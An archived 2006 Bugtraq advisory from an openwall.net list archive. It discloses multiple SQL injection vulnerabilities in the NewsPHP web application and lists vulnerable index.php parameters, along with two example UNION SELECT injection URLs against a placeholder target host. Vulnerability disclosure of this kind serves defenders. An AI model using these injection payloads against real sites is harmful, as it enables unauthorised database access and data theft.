| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060122185035.23621.qmail@securityfocus.com> Date: 22 Jan 2006 18:50:35 -0000 From: s3ude@...urityfocus.com, hotmail.com@...urityfocus.com (at) To: bugtraq@...urityfocus.com Subject: Newsphp Multiple SQL Injection Vulnerabilities Software: NewsPHP Web Site: http://www.newsphp.com Versions: All Type: Multiple SQL Injection Class: Remote Exploit : 1- http://www.target.com/index.php?discuss=SQL 2- http://www.target.com/index.php?tim=SQL 3- http://www.target.com/index.php?id=SQL 4- http://www.target.com/index.php?words=%20&where=1&limit=40&last=SQL 5- http://www.target.com/index.php?words=%20&where=1&limit=SQL 6- http://www.target.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate Example : 1- http://www.target.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* 2- http://www.target.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* Discovered by: SAUDI L-G-H Team http://www.lezr.com Regards ///
Powered by blists - more mailing lists